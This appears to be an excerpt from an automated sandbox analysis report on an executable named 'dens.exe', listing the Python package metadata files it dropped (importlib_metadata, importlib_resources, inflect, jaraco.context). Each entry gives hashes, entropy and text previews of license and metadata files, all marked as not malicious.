                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11358
                                                                                                                                                                                                                                            Entropy (8bit):4.4267168336581415
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:nU6G5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEn7HbHR:U9vlKM1zJlFvmNz5VrlkTS07Ht
                                                                                                                                                                                                                                            MD5:3B83EF96387F14655FC854DDC3C6BD57
                                                                                                                                                                                                                                            SHA1:2B8B815229AA8A61E483FB4BA0588B8B6C491890
                                                                                                                                                                                                                                            SHA-256:CFC7749B96F63BD31C3C42B5C471BF756814053E847C10F3EB003417BC523D30
                                                                                                                                                                                                                                            SHA-512:98F6B79B778F7B0A15415BD750C3A8A097D650511CB4EC8115188E115C47053FE700F578895C097051C9BC3DFB6197C2B13A15DE203273E1A3218884F86E90E8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4648
                                                                                                                                                                                                                                            Entropy (8bit):5.006900644756252
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:Dx2ZSaCSmS8R902Vpnu386eLQ9Ac+fFZpDN00x2jZ2SBXZJSwTE:9Smzf02Vpnu386mQ9B+TP0vJHJSwTE
                                                                                                                                                                                                                                            MD5:98ABEAACC0E0E4FC385DFF67B607071A
                                                                                                                                                                                                                                            SHA1:E8C830D8B0942300C7C87B3B8FD15EA1396E07BD
                                                                                                                                                                                                                                            SHA-256:6A7B90EFFEE1E09D5B484CDF7232016A43E2D9CC9543BCBB8E494B1EC05E1F59
                                                                                                                                                                                                                                            SHA-512:F1D59046FFA5B0083A5259CEB03219CCDB8CC6AAC6247250CBD83E70F080784391FCC303F7630E1AD40E5CCF5041A57CB9B68ADEFEC1EBC6C31FCF7FFC65E9B7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: importlib_metadata.Version: 8.0.0.Summary: Read metadata from Python packages.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Source, https://github.com/python/importlib_metadata.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: zipp >=0.5.Requires-Dist: typing-extensions >=3.6.4 ; python_version < "3.8".Provides-Extra: doc.Requires-Dist: sphinx >=3.5 ; extra == 'doc'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'doc'.Requires-Dist: rst.linker >=1.9 ; extra == 'doc'.Requires-Dist: furo ; extra == 'doc'.Requires-Dist: sphinx-lint ; extra == 'doc'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'doc'.Provides-Extra: perf.Requires-D
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2518
                                                                                                                                                                                                                                            Entropy (8bit):5.6307766747793275
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:UnuXTg06U5J/Vw9l/gfNX7/XzBk9pvJq/fwJOfYrBfnJ/V0XJnzN/3WJV:bXzP/EgdzzBkDJsoIYrBfJ/CXNz9qV
                                                                                                                                                                                                                                            MD5:EB513CAFA5226DDA7D54AFDCC9AD8A74
                                                                                                                                                                                                                                            SHA1:B394C7AEC158350BAF676AE3197BEF4D7158B31C
                                                                                                                                                                                                                                            SHA-256:0D8D3C6EEB9EBBE86CAC7D60861552433C329DA9EA51248B61D02BE2E5E64030
                                                                                                                                                                                                                                            SHA-512:A0017CFAFF47FDA6067E3C31775FACEE4728C3220C2D4BD70DEF328BD20AA71A343E39DA15CD6B406F62311894C518DFCF5C8A4AE6F853946F26A4B4E767924E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:importlib_metadata-8.0.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..importlib_metadata-8.0.0.dist-info/LICENSE,sha256=z8d0m5b2O9McPEK1xHG_dWgUBT6EfBDz6wA0F7xSPTA,11358..importlib_metadata-8.0.0.dist-info/METADATA,sha256=anuQ7_7h4J1bSEzfcjIBakPi2cyVQ7y7jklLHsBeH1k,4648..importlib_metadata-8.0.0.dist-info/RECORD,,..importlib_metadata-8.0.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..importlib_metadata-8.0.0.dist-info/WHEEL,sha256=mguMlWGMX-VHnMpKOjjQidIo1ssRlCFu4a4mBpz1s2M,91..importlib_metadata-8.0.0.dist-info/top_level.txt,sha256=CO3fD9yylANiXkrMo4qHLV_mqXL2sC5JFKgt1yWAT-A,19..importlib_metadata/__init__.py,sha256=tZNB-23h8Bixi9uCrQqj9Yf0aeC--Josdy3IZRIQeB0,33798..importlib_metadata/__pycache__/__init__.cpython-312.pyc,,..importlib_metadata/__pycache__/_adapters.cpython-312.pyc,,..importlib_metadata/__pycache__/_collections.cpython-312.pyc,,..importlib_metadata/__pycache__/_compat.cpython-312.pyc,,..importlib_metadata/__pycac
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):91
                                                                                                                                                                                                                                            Entropy (8bit):4.687870576189661
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeXMRYFAVLMvhRRP+tPCCfA5S:RtC1VLMvhjWBBf
                                                                                                                                                                                                                                            MD5:7D09837492494019EA51F4E97823D79F
                                                                                                                                                                                                                                            SHA1:7829B4324BB542799494131A270EC3BDAD4DEDEF
                                                                                                                                                                                                                                            SHA-256:9A0B8C95618C5FE5479CCA4A3A38D089D228D6CB1194216EE1AE26069CF5B363
                                                                                                                                                                                                                                            SHA-512:A0063220ECDD22C3E735ACFF6DE559ACF3AC4C37B81D37633975A22A28B026F1935CD1957C0FF7D2ECC8B7F83F250310795EECC5273B893FFAB115098F7B9C38
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: setuptools (70.1.1).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):19
                                                                                                                                                                                                                                            Entropy (8bit):3.536886723742169
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:importlib_metadata.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11358
                                                                                                                                                                                                                                            Entropy (8bit):4.4267168336581415
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3944
                                                                                                                                                                                                                                            Entropy (8bit):5.015824473130961
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: importlib_resources.Version: 6.4.0.Summary: Read resources from Python packages.Home-page: https://github.com/python/importlib_resources.Author: Barry Warsaw.Author-email: barry@python.org.Project-URL: Documentation, https://importlib-resources.readthedocs.io/.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.License-File: LICENSE.Requires-Dist: zipp >=3.1.0 ; python_version < "3.10".Provides-Extra: docs.Requires-Dist: sphinx >=3.5 ; extra == 'docs'.Requires-Dist: sphinx <7.2.5 ; extra == 'docs'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'docs'.Requires-Dist: rst.linker >=1.9 ; extra == 'docs'.Requires-Dist: furo ; extra == 'docs'.Requires-Dist: sphinx-lint ; extra == 'docs'.Requires-Dist: jaraco.tidelift >=1.4 ; ext
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7620
                                                                                                                                                                                                                                            Entropy (8bit):5.560551717923108
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:importlib_resources-6.4.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..importlib_resources-6.4.0.dist-info/LICENSE,sha256=z8d0m5b2O9McPEK1xHG_dWgUBT6EfBDz6wA0F7xSPTA,11358..importlib_resources-6.4.0.dist-info/METADATA,sha256=g4eM2LuL0OiZcUVND0qwDJUpE29gOvtO3BSPXTbO9Fk,3944..importlib_resources-6.4.0.dist-info/RECORD,,..importlib_resources-6.4.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..importlib_resources-6.4.0.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..importlib_resources-6.4.0.dist-info/top_level.txt,sha256=fHIjHU1GZwAjvcydpmUnUrTnbvdiWjG4OEVZK8by0TQ,20..importlib_resources/__init__.py,sha256=uyp1kzYR6SawQBsqlyaXXfIxJx4Z2mM8MjmZn8qq2Gk,505..importlib_resources/__pycache__/__init__.cpython-312.pyc,,..importlib_resources/__pycache__/_adapters.cpython-312.pyc,,..importlib_resources/__pycache__/_common.cpython-312.pyc,,..importlib_resources/__pycache__/_itertools.cpython-312.pyc,,..importlib_resource
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                                                                                            Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):20
                                                                                                                                                                                                                                            Entropy (8bit):3.6841837197791887
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:importlib_resources.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1023
                                                                                                                                                                                                                                            Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):21079
                                                                                                                                                                                                                                            Entropy (8bit):5.103530371859935
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: inflect.Version: 7.3.1.Summary: Correctly generate plurals, singular nouns, ordinals, indefinite articles.Author-email: Paul Dyson <pwdyson@yahoo.com>.Maintainer-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Source, https://github.com/jaraco/inflect.Keywords: plural,inflect,participle.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Natural Language :: English.Classifier: Operating System :: OS Independent.Classifier: Topic :: Software Development :: Libraries :: Python Modules.Classifier: Topic :: Text Processing :: Linguistic.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: more-itertools >=8.5.0.Requires-Dist: typeguard >=4.0.1.Requires-Dist: typing-extensions ; python_version < "3.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):943
                                                                                                                                                                                                                                            Entropy (8bit):5.828988691860191
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:inflect-7.3.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..inflect-7.3.1.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..inflect-7.3.1.dist-info/METADATA,sha256=ZgMNY0WAZRs-U8wZiV2SMfjSKqBrMngXyDMs_CAwMwg,21079..inflect-7.3.1.dist-info/RECORD,,..inflect-7.3.1.dist-info/WHEEL,sha256=y4mX-SOX4fYIkonsAGA5N0Oy-8_gI4FXw5HNI1xqvWg,91..inflect-7.3.1.dist-info/top_level.txt,sha256=m52ujdp10CqT6jh1XQxZT6kEntcnv-7Tl7UiGNTzWZA,8..inflect/__init__.py,sha256=Jxy1HJXZiZ85kHeLAhkmvz6EMTdFqBe-duvt34R6IOc,103796..inflect/__pycache__/__init__.cpython-312.pyc,,..inflect/compat/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..inflect/compat/__pycache__/__init__.cpython-312.pyc,,..inflect/compat/__pycache__/py38.cpython-312.pyc,,..inflect/compat/py38.py,sha256=oObVfVnWX9_OpnOuEJn1mFbJxVhwyR5epbiTNXDDaso,160..inflect/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):91
                                                                                                                                                                                                                                            Entropy (8bit):4.7098485981676825
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: setuptools (70.2.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8
                                                                                                                                                                                                                                            Entropy (8bit):3.0
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:inflect.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1023
                                                                                                                                                                                                                                            Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (406)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4020
                                                                                                                                                                                                                                            Entropy (8bit):4.99859161164956
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: jaraco.context.Version: 5.3.0.Summary: Useful decorators and context managers.Home-page: https://github.com/jaraco/jaraco.context.Author: Jason R. Coombs.Author-email: jaraco@jaraco.com.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.License-File: LICENSE.Requires-Dist: backports.tarfile ; python_version < "3.12".Provides-Extra: docs.Requires-Dist: sphinx >=3.5 ; extra == 'docs'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'docs'.Requires-Dist: rst.linker >=1.9 ; extra == 'docs'.Requires-Dist: furo ; extra == 'docs'.Requires-Dist: sphinx-lint ; extra == 'docs'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'docs'.Provides-Extra: testing.Requires-Dist: pytest !=8.1.1,>=6 ; extra == 'testing'.Requires-Dist: pytest-checkdocs >=2.4
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):641
                                                                                                                                                                                                                                            Entropy (8bit):5.76835538630355
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:TGA0a/2zDJAv/TnqfQlWJAL/fy9vKAGvAXCaaryBAl2VrkEQCXvbAT2r1S:TBn/2zDCvbqfuLO9FGoXamalKSCXzB1S
                                                                                                                                                                                                                                            MD5:2B0A77624AE3903E42C3A8213E593796
                                                                                                                                                                                                                                            SHA1:D63027FF018995D0620E2497BCE9678888A57667
                                                                                                                                                                                                                                            SHA-256:55197B88A78443297BB2D827A75BAAE740B33896251D872835D4B4C75EC2F57E
                                                                                                                                                                                                                                            SHA-512:C02FB1554F8F40158BB60F2B4EC07D80F71CFBFFB38463C5809385A7A2FF8DDB2BDFEFE9AE5E67F4DEC3D904A6E0925E565B0EE6363DD0C2ED5B03A96B056B18
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:jaraco.context-5.3.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..jaraco.context-5.3.0.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..jaraco.context-5.3.0.dist-info/METADATA,sha256=xDtguJej0tN9iEXCUvxEJh2a7xceIRVBEakBLSr__tY,4020..jaraco.context-5.3.0.dist-info/RECORD,,..jaraco.context-5.3.0.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..jaraco.context-5.3.0.dist-info/top_level.txt,sha256=0JnN3LfXH4LIRfXL-QFOGCJzQWZO3ELx4R1d_louoQM,7..jaraco/__pycache__/context.cpython-312.pyc,,..jaraco/context.py,sha256=REoLIxDkO5MfEYowt_WoupNCRoxBS5v7YX2PbW8lIcs,9552..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                                                                                            Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                                            MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                                            SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                                            SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                                            SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7
                                                                                                                                                                                                                                            Entropy (8bit):2.5216406363433186
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:GEG0:GEG0
                                                                                                                                                                                                                                            MD5:0BA8D736B7B4AB182687318B0497E61E
                                                                                                                                                                                                                                            SHA1:311BA5FFD098689179F299EF20768EE1A29F586D
                                                                                                                                                                                                                                            SHA-256:D099CDDCB7D71F82C845F5CBF9014E18227341664EDC42F1E11D5DFE5A2EA103
                                                                                                                                                                                                                                            SHA-512:7CCCBB4AFA2FADE40D529482301BEAE152E0C71EE3CC41736EB19E35CFC5EE3B91EF958CF5CA6B7330333B8494FEB6682FD833D5AA16BF4A8F1F721FD859832C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:jaraco.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1023
                                                                                                                                                                                                                                            Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                                            MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                                            SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                                            SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                                            SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                                            Malicious:false
